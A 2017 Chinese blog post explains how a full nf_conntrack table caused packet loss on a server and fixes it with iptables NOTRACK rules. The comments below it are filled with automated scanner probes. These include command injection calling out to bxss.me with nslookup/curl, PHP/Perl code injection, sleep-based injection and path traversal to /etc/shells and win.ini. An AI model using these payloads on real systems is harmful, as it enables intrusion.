Blog - 玉衡的站点

> 发现服务器网络慢，各种丢包问题严重，经过一系列尝试，最后发现是iptable的Nf_conntrack: Table Full问题

最近服务器上网络连接非常慢，从页面访问速度，cgi速度到数据库连接，无论是入站数据和出站数据，都不正常。然后看是查找问题的原因

一开始以为是客户端连接没有及时释放，同时连接数太多导致资源不够用。因为机器本身内存也很小，基本上当时内存也已经占满了，于是改了apache的服务器超时时间

```
Timeout 30
MaxKeepAliveRequests 500
KeepAliveTimeout 2
```

甚至一度关掉了KeepAlive，但是同时连接数还是一直没有下来。

然后怀疑是python cgi的问题，因为没有用fastcgi，wsgi这类的mod，所以每次cgi执行都需要重新加载。于是把cgi用golang重写了一遍，因为它编出来的是二进制的。果然有一些效果，同时连接数一下子就下来了。但是cgi还是经常会连接超时。

因为这个cgi的内部有网页下载和数据库连接，再检查机器本身的下载速度个数据库连接也是很慢，甚至dns服务器也经常连不上。一开始以为是dns服务器的问题，于是改了机器的dns，依然是效果不佳。

今天在网上搜索，偶然发现有人有相同的情况，用dmesg这个命令看到类似这样的日志

```
[5854719.582506] nf_conntrack: table full, dropping packet
```

是因为iptable开启了conntrack,但是连接跟踪表满，于是开始丢包。而这个是在开了nat table之后默认开启的。于是在80端口上限制这个追踪

```
iptables -t raw -A PREROUTING -i lo -j NOTRACK
iptables -t raw -A OUTPUT -o lo -j NOTRACK
```

```
iptables -t raw -A PREROUTING -p tcp -m tcp --dport 8080 -j NOTRACK
iptables -t raw -A OUTPUT -p tcp -m tcp --sport 8080 -j NOTRACK
```

重新检查，终于一切都好了

参考页面: [http://jerrypeng.me/2014/12/08/dreadful-nf-conntrack-table-full-issue/](http://jerrypeng.me/2014/12/08/dreadful-nf-conntrack-table-full-issue/)

Last updated: January 23, 2017

210

Comments

ncMUFCMU · 2026-05-25 02:48:15 UTC
ncMUFCMU · 2026-05-25 02:48:22 UTC
ncMUFCMU · 2026-05-25 02:48:22 UTC

)
ncMUFCMU · 2026-05-25 02:48:22 UTC

response.write(9240277*9696824)
ncMUFCMU · 2026-05-25 02:48:22 UTC

!(()&&!|*|*|
ncMUFCMU · 2026-05-25 02:48:22 UTC

'+response.write(9240277*9696824)+'
ncMUFCMU · 2026-05-25 02:48:22 UTC

^(#$!@#$)(()))******
ncMUFCMU · 2026-05-25 02:48:22 UTC

"+response.write(9240277*9696824)+"
) · 2026-05-25 02:48:22 UTC
response.write(9129309*9168472) · 2026-05-25 02:48:22 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
!(()&&!|*|*| · 2026-05-25 02:48:23 UTC
'+response.write(9129309*9168472)+' · 2026-05-25 02:48:23 UTC
^(#$!@#$)(()))****** · 2026-05-25 02:48:23 UTC
"+response.write(9129309*9168472)+" · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC

'.gethostbyname(lc('hitrl'.'sjkicmnb28037.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(72).chr(119).chr(87).'
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC

'"
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:23 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

".gethostbyname(lc("hitdc"."ofdgbskx3a92f.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(90).chr(113).chr(78)."
ncMUFCMU · 2026-05-25 02:48:24 UTC

echo cixgzq$()\ wjqhbl\nz^xyu||a #' &echo cixgzq$()\ wjqhbl\nz^xyu||a #|" &echo cixgzq$()\ wjqhbl\nz^xyu||a #
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

<!--
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

gethostbyname(lc('hitdu'.'pvyeynrh9c404.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(75).chr(99).chr(87)
ncMUFCMU · 2026-05-25 02:48:24 UTC

&echo fgzsee$()\ pjdljd\nz^xyu||a #' &echo fgzsee$()\ pjdljd\nz^xyu||a #|" &echo fgzsee$()\ pjdljd\nz^xyu||a #
'" · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

'"()
'.gethostbyname(lc('hitmn'.'ruypobqa18c75.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(89).chr(109).chr(89).' · 2026-05-25 02:48:24 UTC
<!-- · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

'&&sleep(27*1000)*kbyhop&&'
ncMUFCMU · 2026-05-25 02:48:24 UTC

expr 9000472346 - 951200
".gethostbyname(lc("hitwl"."kkaeiwkfb2e92.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(82).chr(116).chr(72)." · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

';print(md5(31337));$a='
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

"&&sleep(27*1000)*aqdqeb&&"
ncMUFCMU · 2026-05-25 02:48:24 UTC

(nslookup -q=cname hitjrdiqonkrr58cd3.bxss.me||curl hitjrdiqonkrr58cd3.bxss.me))
ncMUFCMU · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

'||sleep(27*1000)*haykqt||'
ncMUFCMU · 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

"||sleep(27*1000)*gvfbkm||"
ncMUFCMU · 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

${@print(md5(31337))}\
ncMUFCMU · 2026-05-25 02:48:25 UTC
· 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

'.print(md5(31337)).'
ncMUFCMU · 2026-05-25 02:48:25 UTC

bxss.me/t/xss.html?%00
ncMUFCMU · 2026-05-25 02:48:25 UTC
HttP://bxss.me/t/xss.html?%00 · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC

`(nslookup -q=cname hitcsmgvifxxqdf087.bxss.me||curl hitcsmgvifxxqdf087.bxss.me)`
· 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC

;(nslookup -q=cname hitczuujpngct66855.bxss.me||curl hitczuujpngct66855.bxss.me)|(nslookup -q=cname hitczuujpngct66855.bxss.me||curl hitczuujpngct66855.bxss.me)&(nslookup -q=cname hitczuujpngct66855.bxss.me||curl hitczuujpngct66855.bxss.me)
ncMUFCMU · 2026-05-25 02:48:26 UTC
· 2026-05-25 02:48:26 UTC
";print(md5(31337));$a=" · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC

|(nslookup${IFS}-q${IFS}cname${IFS}hitwnhdycctbt4ad42.bxss.me||curl${IFS}hitwnhdycctbt4ad42.bxss.me)
ncMUFCMU · 2026-05-25 02:48:26 UTC
· 2026-05-25 02:48:26 UTC
${@print(md5(31337))} · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
${@print(md5(31337))}\ · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC
echo xvngtz$()\ rujcyt\nz^xyu||a #' &echo xvngtz$()\ rujcyt\nz^xyu||a #|" &echo xvngtz$()\ rujcyt\nz^xyu||a # · 2026-05-25 02:48:27 UTC
'.print(md5(31337)).' · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC

/etc/shells
&echo sczshu$()\ redxmy\nz^xyu||a #' &echo sczshu$()\ redxmy\nz^xyu||a #|" &echo sczshu$()\ redxmy\nz^xyu||a # · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC

../../../../../../../../../../../../../../etc/shells
'"() · 2026-05-25 02:48:27 UTC
ncMUFCMU&echo nfcnyy$()\ kxvxbz\nz^xyu||a #' &echo nfcnyy$()\ kxvxbz\nz^xyu||a #|" &echo nfcnyy$()\ kxvxbz\nz^xyu||a # · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC

c:/windows/win.ini
ncMUFCMU'&&sleep(27*1000)*csrwpd&&' · 2026-05-25 02:48:27 UTC
|echo cychmq$()\ qljkle\nz^xyu||a #' |echo cychmq$()\ qljkle\nz^xyu||a #|" |echo cychmq$()\ qljkle\nz^xyu||a # · 2026-05-25 02:48:27 UTC
ncMUFCMU"&&sleep(27*1000)*atdkzs&&" · 2026-05-25 02:48:28 UTC
ncMUFCMU|echo oyxttb$()\ uvamvc\nz^xyu||a #' |echo oyxttb$()\ uvamvc\nz^xyu||a #|" |echo oyxttb$()\ uvamvc\nz^xyu||a # · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:28 UTC

Http://bxss.me/t/fit.txt
ncMUFCMU'||sleep(27*1000)*gouvuu||' · 2026-05-25 02:48:28 UTC
expr 9000754929 - 923539 · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:28 UTC

http://bxss.me/t/fit.txt?.jpg
ncMUFCMU · 2026-05-25 02:48:28 UTC
(nslookup -q=cname hitwrzcljyifx3b8d6.bxss.me||curl hitwrzcljyifx3b8d6.bxss.me)) · 2026-05-25 02:48:28 UTC
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
&nslookup -q=cname hitjiaeybwlla35610.bxss.me&'\"`0&nslookup -q=cname hitjiaeybwlla35610.bxss.me&`' · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
../../../../../../../../../../../../../../etc/shells · 2026-05-25 02:48:29 UTC
&(nslookup -q=cname hittitgbuplwvca97f.bxss.me||curl hittitgbuplwvca97f.bxss.me)&'\"`0&(nslookup -q=cname hittitgbuplwvca97f.bxss.me||curl hittitgbuplwvca97f.bxss.me)&`' · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
c:/windows/win.ini · 2026-05-25 02:48:29 UTC
|(nslookup -q=cname hiturimxwzbxy1702b.bxss.me||curl hiturimxwzbxy1702b.bxss.me) · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
bxss.me · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

|echo luxvqg$()\ htpeba\nz^xyu||a #' |echo luxvqg$()\ htpeba\nz^xyu||a #|" |echo luxvqg$()\ htpeba\nz^xyu||a #
ncMUFCMU · 2026-05-25 02:48:24 UTC

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
ncMUFCMU · 2026-05-25 02:48:24 UTC
gethostbyname(lc('hitjb'.'qgrwlmom2d76f.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(65).chr(102).chr(70) · 2026-05-25 02:48:24 UTC
ncMUFCMU · 2026-05-25 02:48:24 UTC

";print(md5(31337));$a="
ncMUFCMU · 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

${@print(md5(31337))}
ncMUFCMU · 2026-05-25 02:48:25 UTC

&nslookup -q=cname hityaddhnegeu9aa9f.bxss.me&'\"`0&nslookup -q=cname hityaddhnegeu9aa9f.bxss.me&`'
ncMUFCMU · 2026-05-25 02:48:25 UTC

HttP://bxss.me/t/xss.html?%00
ncMUFCMU · 2026-05-25 02:48:25 UTC

&(nslookup -q=cname hitnzynsoawph16b3e.bxss.me||curl hitnzynsoawph16b3e.bxss.me)&'\"`0&(nslookup -q=cname hitnzynsoawph16b3e.bxss.me||curl hitnzynsoawph16b3e.bxss.me)&`'
ncMUFCMU · 2026-05-25 02:48:25 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

|(nslookup -q=cname hitbclmzagfan80f58.bxss.me||curl hitbclmzagfan80f58.bxss.me)
ncMUFCMU · 2026-05-25 02:48:25 UTC
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7')); · 2026-05-25 02:48:25 UTC
';print(md5(31337));$a=' · 2026-05-25 02:48:26 UTC
bxss.me/t/xss.html?%00 · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC
ncMUFCMU · 2026-05-25 02:48:26 UTC

&(nslookup${IFS}-q${IFS}cname${IFS}hituzpskfwyidb146c.bxss.me||curl${IFS}hituzpskfwyidb146c.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hituzpskfwyidb146c.bxss.me||curl${IFS}hituzpskfwyidb146c.bxss.me)&`'
· 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:27 UTC
ncMUFCMU · 2026-05-25 02:48:28 UTC

bxss.me
ncMUFCMU"||sleep(27*1000)*fonjjv||" · 2026-05-25 02:48:28 UTC
/etc/shells · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:29 UTC
Http://bxss.me/t/fit.txt · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:35 UTC
ncMUFCMU · 2026-05-25 02:48:35 UTC
ncMUFCMU · 2026-05-25 02:48:36 UTC
ncMUFCMU · 2026-05-25 02:48:36 UTC
ncMUFCMU · 2026-05-25 02:48:36 UTC
ncMUFCMU · 2026-05-25 02:48:37 UTC
ncMUFCMU · 2026-05-25 02:48:25 UTC

$(nslookup -q=cname hitcymdsbadrf75da6.bxss.me||curl hitcymdsbadrf75da6.bxss.me)
ncMUFCMU · 2026-05-25 02:48:28 UTC
$(nslookup -q=cname hitddyhxcxwoj286a2.bxss.me||curl hitddyhxcxwoj286a2.bxss.me) · 2026-05-25 02:48:28 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
`(nslookup -q=cname hitlyvsqxojrd13796.bxss.me||curl hitlyvsqxojrd13796.bxss.me)` · 2026-05-25 02:48:29 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
;(nslookup -q=cname hitnuvfhzxpke69c65.bxss.me||curl hitnuvfhzxpke69c65.bxss.me)|(nslookup -q=cname hitnuvfhzxpke69c65.bxss.me||curl hitnuvfhzxpke69c65.bxss.me)&(nslookup -q=cname hitnuvfhzxpke69c65.bxss.me||curl hitnuvfhzxpke69c65.bxss.me) · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
|(nslookup${IFS}-q${IFS}cname${IFS}hitsuyodnrlze0d780.bxss.me||curl${IFS}hitsuyodnrlze0d780.bxss.me) · 2026-05-25 02:48:30 UTC
http://bxss.me/t/fit.txt?.jpg · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
&(nslookup${IFS}-q${IFS}cname${IFS}hitrdhnlfhvqjbdb31.bxss.me||curl${IFS}hitrdhnlfhvqjbdb31.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitrdhnlfhvqjbdb31.bxss.me||curl${IFS}hitrdhnlfhvqjbdb31.bxss.me)&`' · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:30 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:31 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:32 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:33 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:34 UTC
ncMUFCMU · 2026-05-25 02:48:35 UTC
ncMUFCMU · 2026-05-25 02:48:35 UTC
ncMUFCMU · 2026-05-25 02:48:36 UTC
ncMUFCMU · 2026-05-25 02:48:36 UTC
ncMUFCMU · 2026-05-25 02:48:37 UTC

iptable配置导致服务器丢包严重的问题

Add Comment Log in